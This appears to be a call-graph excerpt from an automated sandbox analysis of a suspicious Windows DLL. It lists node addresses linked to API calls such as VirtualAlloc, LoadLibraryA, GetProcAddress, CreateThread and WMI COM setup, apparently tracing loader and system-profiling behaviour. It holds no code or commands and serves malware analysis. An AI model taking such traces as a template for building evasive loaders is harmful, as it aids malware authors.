SetEndOfFile 18924->18926 18925->18904 18926->18924 18928 6d5024ee SetEndOfFile 18927->18928 18929 6d51890f 18927->18929 18928->18921 18929->18928 18930 6d504294 11 API calls 18929->18930 18931 6d5189e2 18930->18931 18932 6d518891 11 API calls 18931->18932 18932->18928 18934 6d504980 18933->18934 18935 6d5048ae 18933->18935 18936 6d504916 18934->18936 18937 6d504988 DeleteCriticalSection 18934->18937 18945 6d515750 18935->18945 18936->18874 18937->18936 18940 6d515092 18939->18940 18941 6d514fd2 18939->18941 18942 6d514fe0 18940->18942 18944 6d5150bb SNifCw242OCD 18940->18944 18941->18942 18943 6d515087 CloseHandle 18941->18943 18942->18879 18943->18942 18944->18942 18946 6d5157b0 18945->18946 18947 6d5157d4 GetProcessHeap 18946->18947 18950 6d5157cd ___scrt_fastfail 18946->18950 18948 6d51583f 18947->18948 18949 6d515868 RtlAllocateHeap 18948->18949 18948->18950 18949->18950 18950->18936 18952 6d513f17 18951->18952 18953 6d507850 18951->18953 18966 6d506b43 18952->18966 18953->18808 18953->18809 18953->18812 18956 6d513f56 18957 6d506b43 2 API calls 18956->18957 18957->18953 18958 6d513f7c 18958->18953 18970 6d516881 18958->18970 18961 6d502a11 18960->18961 18962 6d502a39 18960->18962 18963 6d506b43 2 API calls 18961->18963 18964 6d502a20 18962->18964 18965 6d502a6e ActivateActCtx 18962->18965 18963->18964 18964->18812 18965->18964 18965->18965 18967 6d506b63 GetProcessHeap 18966->18967 18969 6d506b7a 18966->18969 18968 6d506b70 RtlFreeHeap 18967->18968 18967->18969 18968->18969 18969->18953 18969->18956 18969->18958 18971 6d5168cf 18970->18971 18973 6d5168de 18970->18973 18972 6d506b43 2 API calls 18971->18972 18972->18973 18973->18958 18975 6d518ac6 18974->18975 18983 6d518ca5 18974->18983 18993 6d5050ec 18975->18993 18977 6d518bf1 VirtualAlloc 18979 6d518c2b ___scrt_fastfail 18977->18979 18978 6d518b3a 18978->18977 18978->18978 18980 6d518e09 18979->18980 18979->18983 18981 6d506bba LoadLibraryA 18980->18981 18982 6d518ea8 InitializeCriticalSection 18981->18982 18982->18983 18983->18819 18985 6d504610 18984->18985 18986 6d50467a 18984->18986 18999 6d505a34 18985->18999 18988 6d50462f 18986->18988 18989 6d5046a1 OpenThread 18986->18989 18988->18824 18989->18988 18991 6d506bfa LoadLibraryA 18990->18991 18992 6d506c2c 18990->18992 18991->18992 18992->18825 18992->18992 18994 6d505183 18993->18994 18997 6d5051a0 18993->18997 18995 6d506b43 2 API calls 18994->18995 18995->18997 18996 6d5051f7 18996->18978 18997->18996 18998 6d5151f2 11 API calls 18997->18998 18998->18996 19000 6d505e8e 18999->19000 19003 6d505a57 18999->19003 19000->18988 19001 6d505ae2 LoadLibraryA 19001->19003 19002 6d505dd0 GetProcAddress 19002->19003 19003->19000 19003->19001 19003->19002 19003->19003 19004->18829 19006 27a65b5 19005->19006 19011 27a660d 19005->19011 19034 27a8d5b HeapCreate 19006->19034 19008 27a65ba 19035 27a972e 19008->19035 19011->18829 19018 27a6608 19020 27a8d41 2 API calls 19018->19020 19019 27a6612 19055 27a8d41 19019->19055 19020->19011 19027 27a6669 CreateThread 19027->19011 19135 27a6348 19027->19135 19028 27af159 8 API calls 19029 27a6644 19028->19029 19068 27a6420 memset 19029->19068 19034->19008 19087 27a8d70 RtlAllocateHeap 19035->19087 19037 27a65bf 19038 27b3d53 19037->19038 19039 27b3d88 19038->19039 19088 27a8dd5 19039->19088 19041 27a65cd 19042 27af159 19041->19042 19092 27a9f75 19042->19092 19045 27af17b GetModuleHandleA 19048 27af18a 19045->19048 19046 27af183 LoadLibraryA 19046->19048 19047 27af198 19100 27a8d2e 19047->19100 19048->19047 19095 27af10e 19048->19095 19052 27a9f8f 19118 27a8c4a 19052->19118 19054 27a65f4 GetFileAttributesW 19054->19018 19054->19019 19056 27a6617 19055->19056 19057 27a8d4f 19055->19057 19059 27a109a 19056->19059 19058 27a8d86 2 API calls 19057->19058 19058->19056 19060 27a8c4a 2 API calls 19059->19060 19061 27a10b5 19060->19061 19062 27a9e52 19061->19062 19063 27a9e6e 19062->19063 19067 27a662b 19063->19067 19124 27a8d70 RtlAllocateHeap 19063->19124 19065 27a9e81 19066 27a8d86 2 API calls 19065->19066 19065->19067 19066->19067 19067->19027 19067->19028 19125 27a1080 19068->19125 19070 27a644a 19071 27a645b 19070->19071 19072 27a649c 19070->19072 19074 27a1080 2 API calls 19071->19074 19073 27a1080 2 API calls 19072->19073 19075 27a64a6 19073->19075 19076 27a6465 19074->19076 19080 27a8d2e 2 API calls 19075->19080 19128 27a9faf 19076->19128 19078 27a647b 19079 27a8d2e 2 API calls 19078->19079 19081 27a6486 19079->19081 19080->19081 19082 27a8d86 19081->19082 19083 27a6659 19082->19083 19084 27a8d90 19082->19084 19083->19027 19084->19083 19085 27a8f0a memset 19084->19085 19086 27a8dc0 HeapFree 19085->19086 19086->19083 19087->19037 19091 27a8d70 RtlAllocateHeap 19088->19091 19090 27a8de6 19090->19041 19091->19090 19104 27a8b74 19092->19104 19111 27a8d70 RtlAllocateHeap 19095->19111 19097 27af14f 19097->19047 19099 27af120 19099->19097 19112 27aefb8 19099->19112 19101 27a65e3 19100->19101 19102 27a8d36 19100->19102 19101->19052 19103 27a8d86 2 API calls 19102->19103 19103->19101 19106 27a8b8b 19104->19106 19109 27a8bac 19104->19109 19105 27a8bf3 lstrlenW 19107 27a8bff 19105->19107 19106->19109 19110 27a8d70 RtlAllocateHeap 19106->19110 19107->19045 19107->19046 19109->19105 19109->19107 19110->19109 19111->19099 19113 27af02c 19112->19113 19114 27aefd1 19112->19114 19113->19099 19114->19113 19115 27af084 LoadLibraryA 19114->19115 19115->19113 19116 27af092 GetProcAddress 19115->19116 19116->19113 19117 27af09e 19116->19117 19117->19113 19120 27a8c6b 19118->19120 19119 27a8cd8 lstrlenW 19123 27a8d70 RtlAllocateHeap 19119->19123 19120->19119 19120->19120 19122 27a8cf2 19122->19054 19122->19122 19123->19122 19124->19065 19126 27a8b74 2 API calls 19125->19126 19127 27a1096 19126->19127 19127->19070 19132 27a8f0a 19128->19132 19131 27a9fdd 19131->19078 19133 27a8f13 memset 19132->19133 19134 27a8f24 _vsnprintf 19132->19134 19133->19134 19134->19131 19147 27a64c2 19135->19147 19139 27a6359 19141 27a6393 19139->19141 19146 27a6363 19139->19146 19209 27ad907 19139->19209 19148 27af159 8 API calls 19147->19148 19149 27a64d6 19148->19149 19150 27af159 8 API calls 19149->19150 19151 27a64ef 19150->19151 19152 27af159 8 API calls 19151->19152 19153 27a6508 19152->19153 19154 27af159 8 API calls 19153->19154 19155 27a6521 19154->19155 19156 27af159 8 API calls 19155->19156 19157 27a653c 19156->19157 19158 27af159 8 API calls 19157->19158 19159 27a6555 19158->19159 19160 27af159 8 API calls 19159->19160 19161 27a656e 19160->19161 19162 27af159 8 API calls 19161->19162 19163 27a6587 19162->19163 19164 27af159 8 API calls 19163->19164 19165 27a634d GetOEMCP 19164->19165 19166 27ae040 19165->19166 19256 27a8d70 RtlAllocateHeap 19166->19256 19168 27ae05b 19169 27ae066 GetCurrentProcessId 19168->19169 19208 27ae3bb 19168->19208 19170 27ae07e 19169->19170 19257 27aca1b 19170->19257 19208->19139 19256->19168 20604 6d51518a 20603->20604 20605 6d51519f 20603->20605 20606 6d515750 2 API calls 20604->20606 20607 6d515195 20605->20607 20608 6d5151b2 CreateFileA 20605->20608 20606->20607 20607->18841 20608->20607 20608->20608 20957 6d5082b2 20958 6d5082be ___scrt_is_nonwritable_in_current_image 20957->20958 20959 6d5082e7 dllmain_raw 20958->20959 20961 6d5082e2 20958->20961 20963 6d5082cd ___scrt_is_nonwritable_in_current_image 20958->20963 20960 6d508301 dllmain_crt_dispatch 20959->20960 20959->20963 20960->20961 20960->20963 20971 6d514ed7 20961->20971 20964 6d508322 20965 6d50834e 20964->20965 20967 6d514ed7 2 API calls 20964->20967 20965->20963 20966 6d508357 dllmain_crt_dispatch 20965->20966 20966->20963 20968 6d50836a dllmain_raw 20966->20968 20969 6d50833a dllmain_crt_dispatch dllmain_raw 20967->20969 20970 6d50839c 20968->20970 20969->20965 20970->20963 20972 6d514ee4 GetProcessHeap HeapAlloc 20971->20972 20973 6d514f28 ___scrt_fastfail 20971->20973 20972->20973 20973->20964 23005 27a1295 23006 27aaaba 4 API calls 23005->23006 23007 27a12ac 23006->23007 23008 27a12d1 23007->23008 23009 27b36f2 2 API calls 23007->23009 23043 27a117d 23008->23043 23009->23008 23012 27aab8d 4 API calls 23013 27a1316 23012->23013 23042 27a13d4 23013->23042 23050 27a7c0e 23013->23050 23014 27ab316 4 API calls 23016 27a13eb 23014->23016 23018 27ab403 5 API calls 23016->23018 23020 27a13f7 23018->23020 23019 27a133d 23027 27a8d86 2 API calls 23019->23027 23238 27a7a4e 23020->23238 23021 27aab8d 4 API calls 23024 27a1368 23021->23024 23023 27ab316 4 API calls 23026 27a138d 23023->23026 23035 27a1371 23024->23035 23065 27a6935 23024->23065 23216 27ab403 23026->23216 23031 27a1306 23027->23031 23028 27a142c 23267 27a110a 23028->23267 23034 27a143e 23034->23019 23038 27a110a 8 API calls 23034->23038 23035->23023 23036 27a1438 23277 27a10ba 23036->23277 23038->23036 23042->23014 23044 27a9f75 2 API calls 23043->23044 23045 27a118e 23044->23045 23046 27a9ba4 2 API calls 23045->23046 23047 27a11aa 23046->23047 23048 27a8d2e 2 API calls 23047->23048 23049 27a11b7 23048->23049 23049->23012 23049->23031 23285 27a7e5c 23050->23285 23052 27a7c2b 23063 27a1334 23052->23063 23296 27a769f 23052->23296 23054 27a7c55 23064 27a7c5c 23054->23064 23313 27a7639 23054->23313 23055 27a8d86 2 API calls 23056 27a7c97 23055->23056 23057 27a8d86 2 API calls 23056->23057 23059 27a7ca2 23057->23059 23061 27a8d86 2 API calls 23059->23061 23061->23063 23063->23019 23063->23021 23063->23035 23064->23055 23571 27a8d70 RtlAllocateHeap 23065->23571 23067 27a694b 23068 27aab09 4 API calls 23067->23068 23215 27a6e47 23067->23215 23069 27a6960 23068->23069 23572 27afd5a 23069->23572 23074 27a9a5a RtlAllocateHeap 23075 27a6984 23074->23075 23076 27a9a5a RtlAllocateHeap 23075->23076 23077 27a6998 23076->23077 23078 27a69bd 23077->23078 23080 27a9a5a RtlAllocateHeap 23077->23080 23079 27a9a5a RtlAllocateHeap 23078->23079 23081 27a69e2 23079->23081 23080->23078 23598 27ae8c9 23081->23598 23087 27a6a51 23088 27a6a76 23087->23088 23645 27a8d70 RtlAllocateHeap 23087->23645 23089 27a109a 2 API calls 23088->23089 23091 27a6aa5 23089->23091 23646 27ab84b 23091->23646 23092 27a6a62 23092->23088 23094 27abba6 memset 23092->23094 23094->23088 23096 27a8d41 2 API calls 23097 27a6abf 23096->23097 23098 27a109a 2 API calls 23097->23098 23099 27a6acb 23098->23099 23100 27ab84b 5 API calls 23099->23100 23101 27a6ad6 23100->23101 23215->23035 23217 27aaaba 4 API calls 23216->23217 23218 27ab415 23217->23218 23219 27aa202 GetSystemTimeAsFileTime 23218->23219 23220 27a1399 23219->23220 23221 27a7cb6 23220->23221 23749 27b053f 23221->23749 23223 27a7cd6 23752 27a80ed 23223->23752 23930 27a98ac 23238->23930 23241 27b053f GetTickCount 23242 27a7a95 23241->23242 23936 27a7eb9 23242->23936 23244 27a7ab5 23245 27a769f 19 API calls 23244->23245 23255 27a1420 23244->23255 23246 27a7ae5 23245->23246 23247 27a7aec 23246->23247 23251 27a7639 8 API calls 23246->23251 23248 27a8d86 2 API calls 23247->23248 23249 27a7bee 23248->23249 23250 27a8d86 2 API calls 23249->23250 23252 27a7bf9 23250->23252 23253 27a7b16 23251->23253 23254 27a8d86 2 API calls 23252->23254 23253->23247 23975 27a78e6 23253->23975 23254->23255 23255->23028 23255->23034 23257 27a7b41 23257->23247 23988 27a77b6 23257->23988 23260 27a110a 8 API calls 23261 27a7b81 23260->23261 23262 27a7b8d 23261->23262 23263 27a8f0a memset 23261->23263 24002 27a7765 23262->24002 23264 27a7ba2 23263->23264 23265 27a1d6e 6 API calls 23264->23265 23265->23262 23268 27a1120 23267->23268 23269 27aa078 memset 23268->23269 23276 27a1174 23268->23276 23270 27a1146 23269->23270 23271 27aa202 GetSystemTimeAsFileTime 23270->23271 23272 27a115b 23271->23272 23273 27aac2e 6 API calls 23272->23273 23274 27a1169 23273->23274 23275 27aac02 6 API calls 23274->23275 23275->23276 23276->23036 23278 27a10da 23277->23278 23279 27a10c6 23277->23279 23281 27aab09 4 API calls 23278->23281 23280 27aab09 4 API calls 23279->23280 23282 27a10cd 23280->23282 23281->23282 23283 27a9faf 2 API calls 23282->23283 23284 27a10fd 23283->23284 23284->23019 23325 27b11d0 23285->23325 23287 27a7e65 23329 27a88ce 23287->23329 23289 27a7e78 23290 27a88ce strncpy 23289->23290 23291 27a7e8c 23290->23291 23292 27a88ce strncpy 23291->23292 23293 27a7ea0 23292->23293 23333 27b1c51 23293->23333 23295 27a7ea8 23295->23052 23425 27a7588 23296->23425 23299 27abf67 RtlAllocateHeap 23300 27a76d9 23299->23300 23310 27a770e 23300->23310 23436 27a74a5 23300->23436 23301 27a8d86 2 API calls 23303 27a7726 23301->23303 23304 27a8d86 2 API calls 23303->23304 23305 27a7731 23304->23305 23306 27a8d86 2 API calls 23305->23306 23309 27a773c 23306->23309 23307 27a76e7 23307->23310 23444 27afb2f 23307->23444 23311 27a7746 23309->23311 23312 27a8d86 2 API calls 23309->23312 23310->23301 23311->23054 23312->23311 23314 27abfd9 2 API calls 23313->23314 23315 27a7651 23314->23315 23316 27a768d 23315->23316 23317 27a7501 5 API calls 23315->23317 23322 27a786c 23316->23322 23318 27a7670 23317->23318 23319 27b04a2 lstrlenW 23318->23319 23320 27a7684 23319->23320 23321 27a8e72 lstrlenW 23320->23321 23321->23316 23512 27b1d3e 23322->23512 23324 27a7885 23324->23064 23327 27b11d8 23325->23327 23326 27b11df 23326->23287 23327->23326 23338 27b290c 23327->23338 23330 27a88df 23329->23330 23331 27a88e4 23329->23331 23330->23289 23356 27b12b0 23331->23356 23334 27b1c60 23333->23334 23335 27b1c65 23334->23335 23368 27b1bf5 23334->23368 23335->23295 23337 27b1c7e 23337->23295 23339 27b291b 23338->23339 23340 27b294e 23338->23340 23341 27b293f SwitchToThread 23339->23341 23342 27b292c 23339->23342 23340->23326 23341->23340 23341->23341 23343 27b2935 23342->23343 23345 27b28e6 23342->23345 23343->23326 23350 27b296e GetModuleHandleW 23345->23350 23347 27b28f3 23349 27b2901 23347->23349 23355 27b2950 _time64 GetCurrentProcessId 23347->23355 23349->23343 23351 27b298c GetProcAddress 23350->23351 23354 27b29bd 23350->23354 23352 27b29a0 GetProcAddress 23351->23352 23351->23354 23353 27b29af GetProcAddress 23352->23353 23352->23354 23353->23354 23354->23347 23355->23349 23357 27b12e2 23356->23357 23358 27b12bb 23356->23358 23357->23330 23358->23357 23360 27b12f6 23358->23360 23361 27b1324 23360->23361 23362 27b1301 23360->23362 23361->23357 23362->23361 23364 27b2ef8 23362->23364 23365 27b2f10 23364->23365 23366 27b2f97 strncpy 23365->23366 23367 27b2f63 23365->23367 23366->23367 23367->23361 23369 27b1c08 23368->23369 23371 27b1c24 23369->23371 23372 27b14e2 23369->23372 23371->23337 23373 27b1510 23372->23373 23390 27b1522 23372->23390 23374 27b15cd 23373->23374 23375 27b154c 23373->23375 23376 27b157c 23373->23376 23377 27b16e0 23373->23377 23381 27b15ac 23373->23381 23373->23390 23413 27b1cab _snprintf 23374->23413 23380 27b1552 _snprintf 23375->23380 23396 27b33f7 23376->23396 23379 27b1cab 2 API calls 23377->23379 23384 27b170f 23379->23384 23380->23390 23408 27b1a27 23381->23408 23387 27b1791 23384->23387 23384->23390 23394 27b18c7 23384->23394 23385 27b15dc 23386 27b14e2 11 API calls 23385->23386 23385->23390 23386->23385 23389 27b17d2 qsort 23387->23389 23387->23390 23388 27b1a27 2 API calls 23388->23394 23389->23390 23391 27b17fb 23389->23391 23390->23371 23391->23390 23391->23391 23393 27b1a27 2 API calls 23391->23393 23395 27b14e2 11 API calls 23391->23395 23392 27b14e2 11 API calls 23392->23394 23393->23391 23394->23388 23394->23390 23394->23392 23395->23391 23397 27b3401 23396->23397 23398 27b3404 _snprintf 23396->23398 23397->23398 23399 27b342d 23398->23399 23400 27b34a4 23398->23400 23399->23400 23418 27b33d0 localeconv 23399->23418 23400->23390 23403 27b346b strchr 23403->23400 23406 27b347e 23403->23406 23404 27b3447 strchr 23404->23403 23405 27b3455 23404->23405 23405->23400 23405->23403 23406->23400 23421 27a8e72 23406->23421 23410 27b1a3d 23408->23410 23409 27b1bc5 23409->23390 23410->23409 23411 27b1b40 _snprintf 23410->23411 23412 27b1b57 _snprintf 23410->23412 23411->23410 23412->23410 23415 27b1ccc 23413->23415 23414 27b1cd3 23414->23385 23415->23414 23416 27b2ef8 strncpy 23415->23416 23417 27b1ce9 23416->23417 23417->23385 23419 27b33e0 strchr 23418->23419 23420 27b33f2 strchr 23418->23420 23419->23420 23420->23403 23420->23404 23422 27a8e9e 23421->23422 23422->23422 23423 27a8ebe lstrlenW 23422->23423 23424 27a8ed2 23423->23424 23424->23400 23424->23424 23448 27a8d70 RtlAllocateHeap 23425->23448 23427 27a75a2 23428 27a7623 23427->23428 23429 27b3598 2 API calls 23427->23429 23428->23299 23428->23311 23430 27a75c6 23429->23430 23449 27a7501 23430->23449 23432 27a75db 23433 27b04a2 lstrlenW 23432->23433 23434 27a760e 23433->23434 23435 27a8f0a memset 23434->23435 23435->23428 23437 27a74b6 23436->23437 23438 27a9877 2 API calls 23437->23438 23439 27a74d2 23438->23439 23458 27a8d70 RtlAllocateHeap 23439->23458 23441 27a74dd 23442 27a74f7 23441->23442 23443 27a9faf 2 API calls 23441->23443 23442->23307 23443->23442 23445 27afb43 23444->23445 23447 27afb89 23445->23447 23459 27afb90 23445->23459 23447->23310 23448->23427 23450 27a751a 23449->23450 23451 27a1080 2 API calls 23450->23451 23452 27a7527 lstrcpynA 23451->23452 23453 27a7545 23452->23453 23454 27a8d2e 2 API calls 23453->23454 23455 27a754f 23454->23455 23456 27a8f0a memset 23455->23456 23457 27a7574 23456->23457 23457->23432 23458->23441 23464 27af823 memset memset 23459->23464 23461 27afbbc 23462 27afbdf 23461->23462 23490 27af621 23461->23490 23462->23445 23465 27a9f75 2 API calls 23464->23465 23466 27af877 23465->23466 23467 27a9f75 2 API calls 23466->23467 23468 27af884 23467->23468 23469 27a9f75 2 API calls 23468->23469 23470 27af891 23469->23470 23471 27a9f75 2 API calls 23470->23471 23472 27af89e 23471->23472 23473 27a9f75 2 API calls 23472->23473 23474 27af8a9 23473->23474 23475 27a8f0a memset 23474->23475 23487 27af8bd 23475->23487 23476 27af93a GetLastError 23476->23487 23477 27afa8d 23478 27a8f0a memset 23477->23478 23483 27af907 23477->23483 23479 27afaaf 23478->23479 23481 27afacb GetLastError 23479->23481 23479->23483 23480 27af97b GetLastError 23480->23487 23481->23483 23482 27af9d3 GetLastError 23482->23487 23483->23461 23485 27a9f75 2 API calls 23485->23487 23486 27a8d2e 2 API calls 23486->23487 23487->23476 23487->23477 23487->23480 23487->23482 23487->23483 23487->23485 23487->23486 23488 27aa202 GetSystemTimeAsFileTime 23487->23488 23489 27afa4d GetLastError 23487->23489 23506 27af769 23487->23506 23488->23487 23489->23487 23491 27af63e 23490->23491 23510 27a8d70 RtlAllocateHeap 23491->23510 23493 27af653 23496 27af65c 23493->23496 23511 27a8d70 RtlAllocateHeap 23493->23511 23495 27af72f 23498 27af747 23495->23498 23499 27a8d86 2 API calls 23495->23499 23496->23495 23497 27a8d86 2 API calls 23496->23497 23497->23495 23498->23462 23499->23498 23500 27af709 GetLastError 23500->23496 23501 27af715 23500->23501 23503 27aa202 GetSystemTimeAsFileTime 23501->23503 23502 27aa202 GetSystemTimeAsFileTime 23504 27af66c 23502->23504 23503->23496 23504->23495 23504->23496 23504->23500 23504->23502 23505 27a8e04 3 API calls 23504->23505 23505->23504 23507 27af78b 23506->23507 23508 27af7b0 GetLastError 23507->23508 23509 27af7ab 23507->23509 23508->23509 23509->23487 23510->23493 23511->23504 23513 27b1d91 23512->23513 23514 27b1d4b 23512->23514 23513->23324 23514->23513 23517 27b2489 23514->23517 23516 27b1d7e 23516->23324 23524 27b1e8c 23517->23524 23519 27b24a0 23522 27b24c7 23519->23522 23528 27b25fd 23519->23528 23521 27b24be 23521->23522 23523 27b1e8c 8 API calls 23521->23523 23522->23516 23523->23522 23525 27b1e9e 23524->23525 23527 27b1ed7 23525->23527 23538 27b202b 23525->23538 23527->23519 23529 27b2614 23528->23529 23536 27b265e 23528->23536 23530 27b2630 23529->23530 23531 27b2684 23529->23531 23529->23536 23533 27b2673 23530->23533 23534 27b2635 23530->23534 23564 27b2409 23531->23564 23554 27b24fa 23533->23554 23534->23536 23537 27b2646 memchr 23534->23537 23536->23521 23537->23536 23539 27b2045 23538->23539 23540 27b206a 23539->23540 23541 27b20ff 23539->23541 23543 27b20b4 23539->23543 23540->23527 23541->23540 23545 27b34b7 23541->23545 23544 27b20c4 _errno _strtoi64 _errno 23543->23544 23544->23540 23551 27b351b localeconv 23545->23551 23548 27b34ef 23549 27b34fe _errno 23548->23549 23550 27b350a 23548->23550 23549->23550 23550->23540 23552 27b352b strchr 23551->23552 23553 27b34c6 _errno strtod 23551->23553 23552->23553 23553->23548 23553->23549 23555 27b11d0 7 API calls 23554->23555 23556 27b2506 23555->23556 23557 27b1e8c 8 API calls 23556->23557 23563 27b2528 23556->23563 23562 27b251c 23557->23562 23558 27b2545 memchr 23558->23562 23558->23563 23559 27b1e8c 8 API calls 23559->23562 23560 27b25fd 17 API calls 23560->23562 23561 27b12f6 strncpy 23561->23562 23562->23558 23562->23559 23562->23560 23562->23561 23562->23563 23563->23536 23565 27b2412 23564->23565 23566 27b1e8c 8 API calls 23565->23566 23567 27b242d 23565->23567 23569 27b2425 23566->23569 23567->23536 23568 27b25fd 18 API calls 23568->23569 23569->23567 23569->23568 23570 27b1e8c 8 API calls 23569->23570 23570->23569 23571->23067 23573 27a9faf 2 API calls 23572->23573 23574 27a696b 23573->23574 23575 27ae815 23574->23575 23576 27a9f8f 2 API calls 23575->23576 23577 27ae82a 23576->23577 23720 27ae503 CoInitializeEx CoInitializeSecurity CoCreateInstance 23577->23720 23580 27a8d41 2 API calls 23581 27ae842 23580->23581 23582 27a9f8f 2 API calls 23581->23582 23597 27a6970 23581->23597 23583 27ae856 23582->23583 23584 27a9f8f 2 API calls 23583->23584 23585 27ae867 23584->23585 23727 27ae759 SysAllocString SysAllocString 23585->23727 23587 27ae878 23588 27ae8a6 23587->23588 23589 27a9a5a RtlAllocateHeap 23587->23589 23590 27a8d41 2 API calls 23588->23590 23591 27ae887 VariantClear 23589->23591 23592 27ae8af 23590->23592 23591->23588 23594 27a8d41 2 API calls 23592->23594 23595 27ae8b8 23594->23595 23733 27ae5b7 23595->23733 23597->23074 23599 27a9f8f 2 API calls 23598->23599 23600 27ae8db 23599->23600 23601 27ae503 6 API calls 23600->23601 23602 27ae8e5 23601->23602 23603 27a8d41 2 API calls 23602->23603 23604 27ae8f3 23603->23604 23605 27a9f8f 2 API calls 23604->23605 23620 27a6a24 23604->23620 23606 27ae907 23605->23606 23607 27a9f8f 2 API calls 23606->23607 23608 27ae918 23607->23608 23609 27ae759 10 API calls 23608->23609 23610 27ae929 23609->23610 23611 27ae957 23610->23611 23612 27a9a5a RtlAllocateHeap 23610->23612 23613 27a8d41 2 API calls 23611->23613 23614 27ae938 VariantClear 23612->23614 23615 27ae960 23613->23615 23614->23611 23617 27a8d41 2 API calls 23615->23617 23618 27ae969 23617->23618 23619 27ae5b7 2 API calls 23618->23619 23619->23620 23621 27ae97a 23620->23621 23622 27a9f8f 2 API calls 23621->23622 23623 27ae98f 23622->23623 23624 27ae503 6 API calls 23623->23624 23625 27ae999 23624->23625 23626 27a8d41 2 API calls 23625->23626 23627 27ae9a7 23626->23627 23628 27a6a2c 23627->23628 23629 27a9f8f 2 API calls 23627->23629 23644 27a8d70 RtlAllocateHeap 23628->23644 23630 27ae9b8 23629->23630 23631 27a9f8f 2 API calls 23630->23631 23632 27ae9c9 23631->23632 23633 27ae759 10 API calls 23632->23633 23634 27ae9da 23633->23634 23635 27aea08 23634->23635 23636 27a9a5a RtlAllocateHeap 23634->23636 23637 27a8d41 2 API calls 23635->23637 23638 27ae9e9 VariantClear 23636->23638 23639 27aea11 23637->23639 23638->23635 23641 27a8d41 2 API calls 23639->23641 23642 27aea1a 23641->23642 23643 27ae5b7 2 API calls 23642->23643 23643->23628 23644->23087 23645->23092 23647 27a8f0a memset 23646->23647 23648 27ab88f 23647->23648 23649 27a8f0a memset 23648->23649 23650 27ab89b 23649->23650 23653 27a6ab0 23650->23653 23659 27ab9f3 23650->23659 23738 27a8d70 RtlAllocateHeap 23650->23738 23651 27a8d86 2 API calls 23651->23653 23653->23096 23654 27a9ba4 2 API calls 23656 27ab90a 23654->23656 23655 27a9a1d RtlAllocateHeap 23655->23656 23656->23653 23656->23654 23656->23655 23657 27a8d86 2 API calls 23656->23657 23658 27ab9b9 23656->23658 23656->23659 23657->23656 23658->23659 23660 27a9acd 2 API calls 23658->23660 23659->23651 23661 27ab9dc 23660->23661 23661->23659 23662 27ab9e2 23661->23662 23663 27a8d86 2 API calls 23662->23663 23663->23653 23721 27ae548 SysAllocString 23720->23721 23723 27ae585 23720->23723 23722 27ae563 23721->23722 23722->23723 23724 27ae567 CoSetProxyBlanket 23722->23724 23723->23580 23724->23723 23725 27ae57e 23724->23725 23737 27a8d70 RtlAllocateHeap 23725->23737 23728 27a9f8f 2 API calls 23727->23728 23729 27ae784 SysAllocString 23728->23729 23730 27a8d41 2 API calls 23729->23730 23731 27ae797 SysFreeString SysFreeString SysFreeString 23730->23731 23731->23587 23734 27ae5c2 23733->23734 23735 27a8d86 2 API calls 23734->23735 23736 27ae5df 23735->23736 23736->23597 23737->23723 23738->23656 23750 27b055f GetTickCount 23749->23750 23751 27b054e __aulldiv 23749->23751 23750->23223 23751->23223 23753 27b11d0 7 API calls 23752->23753 23754 27a80fd 23753->23754 23755 27a88ce strncpy 23754->23755 23756 27a8116 23755->23756 23757 27a88ce strncpy 23756->23757 23758 27a812a 23757->23758 23759 27a88ce strncpy 23758->23759 23760 27a813b 23759->23760 23761 27a88ce strncpy 23760->23761 23762 27a814e 23761->23762 23763 27a88ce strncpy 23762->23763 23764 27a8164 23763->23764 23765 27a88ce strncpy 23764->23765 23766 27a8178 23765->23766 23767 27a88ce strncpy 23766->23767 23768 27a8191 23767->23768 23769 27a88ce strncpy 23768->23769 23770 27a81a5 23769->23770 23771 27a88ce strncpy 23770->23771 23772 27a81b9 23771->23772 23773 27a88ce strncpy 23772->23773 23774 27a81cd 23773->23774 23775 27a88ce strncpy 23774->23775 23776 27a81e3 23775->23776 23777 27a88ce strncpy 23776->23777 23778 27a81fa 23777->23778 23908 27a892a 23778->23908 23781 27a88ce strncpy 23782 27a820d 23781->23782 23783 27a88ce strncpy 23782->23783 23784 27a8221 23783->23784 23785 27a88ce strncpy 23784->23785 23786 27a8235 23785->23786 23787 27a892a 5 API calls 23786->23787 23788 27a823d 23787->23788 23789 27a88ce strncpy 23788->23789 23790 27a8248 23789->23790 23791 27a892a 5 API calls 23790->23791 23792 27a8250 23791->23792 23793 27a88ce strncpy 23792->23793 23794 27a825b 23793->23794 23919 27a9b09 23908->23919 23910 27a893d 23911 27a8d86 2 API calls 23910->23911 23912 27a8202 23910->23912 23911->23912 23912->23781 23920 27a9b18 WideCharToMultiByte 23919->23920 23926 27a9b68 23919->23926 23921 27a9b33 23920->23921 23920->23926 23928 27a8d70 RtlAllocateHeap 23921->23928 23923 27a9b3c 23924 27a9b44 WideCharToMultiByte 23923->23924 23923->23926 23925 27a9b5d 23924->23925 23924->23926 23927 27a8d86 2 API calls 23925->23927 23926->23910 23927->23926 23928->23923 23931 27a98ba 23930->23931 23931->23931 23932 27b36f2 2 API calls 23931->23932 23933 27a9904 23932->23933 23934 27a7a90 23933->23934 23935 27b36f2 2 API calls 23933->23935 23934->23241 23935->23933 23937 27b11d0 7 API calls 23936->23937 23938 27a7ec8 23937->23938 23939 27a88ce strncpy 23938->23939 23940 27a7ede 23939->23940 23941 27a88ce strncpy 23940->23941 23942 27a7ef3 23941->23942 23943 27a88ce strncpy 23942->23943 23944 27a7f07 23943->23944 23945 27a88ce strncpy 23944->23945 23946 27a7f1c 23945->23946 23947 27a88ce strncpy 23946->23947 23948 27a7f2d 23947->23948 23949 27a88ce strncpy 23948->23949 23950 27a7f46 23949->23950 23951 27a88ce strncpy 23950->23951 23952 27a7f5c 23951->23952 23953 27a88ce strncpy 23952->23953 23954 27a7f6d 23953->23954 23955 27a88ce strncpy 23954->23955 23956 27a7f81 23955->23956 23957 27a88ce strncpy 23956->23957 23958 27a7f94 23957->23958 23959 27a88ce strncpy 23958->23959 23960 27a7fa8 23959->23960 23961 27a88ce strncpy 23960->23961 23962 27a7fc7 23961->23962 23963 27a892a 5 API calls 23962->23963 23964 27a7fd8 23963->23964 23965 27a88ce strncpy 23964->23965 23966 27a7fe3 23965->23966 23967 27a892a 5 API calls 23966->23967 23968 27a7ff4 23967->23968 23969 27a88ce strncpy 23968->23969 23970 27a7fff 23969->23970 23971 27a88ce strncpy 23970->23971 23972 27a801b 23971->23972 23973 27b1c51 13 API calls 23972->23973 23974 27a8023 23973->23974 23974->23244 23976 27b1d3e 18 API calls 23975->23976 23977 27a7904 23976->23977 23978 27aa078 memset 23977->23978 23981 27a7910 23977->23981 23979 27a7944 23978->23979 23979->23981 24009 27a8d70 RtlAllocateHeap 23979->24009 